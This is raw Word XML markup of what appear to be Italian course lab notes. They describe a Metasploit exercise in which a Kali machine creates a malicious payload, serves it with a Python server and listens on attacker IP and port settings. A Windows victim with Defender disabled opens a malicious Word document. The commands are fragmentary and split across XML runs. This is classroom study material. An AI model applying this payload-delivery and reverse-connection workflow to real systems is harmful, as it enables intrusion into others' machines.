      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>macchina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lezione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00196577">
        <w:t xml:space="preserve"> con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00196577">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00196577">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00196577">
        <w:t>statico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, il software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il server C2 è Metasploit,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visto a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lezione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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riporto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA0797">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comandi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>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lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>creo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> il software </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>malevolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0081456B" w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0081456B" w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>scaricare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n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macchin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d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vittima</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DC1B022" w14:textId="410CF17E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</w:t>
      </w:r>
      <w:r w:rsidR="00196577">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipAttaccante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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35F60C04" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidR="0080432E">
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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2E9CDCD3" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t xml:space="preserve">set LPORT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00196577">
        <w:t>porta</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>metto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>ascolto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>altro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> server per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>permettere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>scaricare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> il payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0081456B">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>malevolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5368B0F9" w14:textId="213281B1" w:rsidR="0081456B" w:rsidRDefault="0081456B" w:rsidP="0081456B">
      <w:r>
        <w:t xml:space="preserve">python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3ABC3011" w:rsidR="00B160DA" w:rsidRPr="00B160DA" w:rsidRDefault="00B160DA" w:rsidP="0081456B">
      <w:r w:rsidRPr="00B160DA">
        <w:t>La</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vittima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cchina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Windows con Windows Defender </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>disabilitato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> e con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pacchetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Office </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>installato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BA0797">
        <w:t xml:space="preserve">per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA0797">
        <w:t>permettere</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA0797">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA0797">
        <w:t>l’apertura</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA0797">
        <w:t xml:space="preserve"> del document Word </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA0797">
        <w:t>malevolo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A536A2">
        <w:t>.</w:t>
      </w:r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2214D0"/>
    <w:rsid w:val="003104B9"/>
    <w:rsid w:val="003833E3"/>
    <w:rsid w:val="00387493"/>
    <w:rsid w:val="003D71C6"/>
    <w:rsid w:val="004E5B38"/>
    <w:rsid w:val="007E6D03"/>
    <w:rsid w:val="0080432E"/>
    <w:rsid w:val="0081456B"/>
    <w:rsid w:val="00A536A2"/>
    <w:rsid w:val="00AE059A"/>
    <w:rsid w:val="00B046EC"/>
    <w:rsid w:val="00B160DA"/>
    <w:rsid w:val="00B355D4"/>
    <w:rsid w:val="00B40B24"/>
    <w:rsid w:val="00BA0797"/>
    <w:rsid w:val="00D5452C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4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15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T13:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01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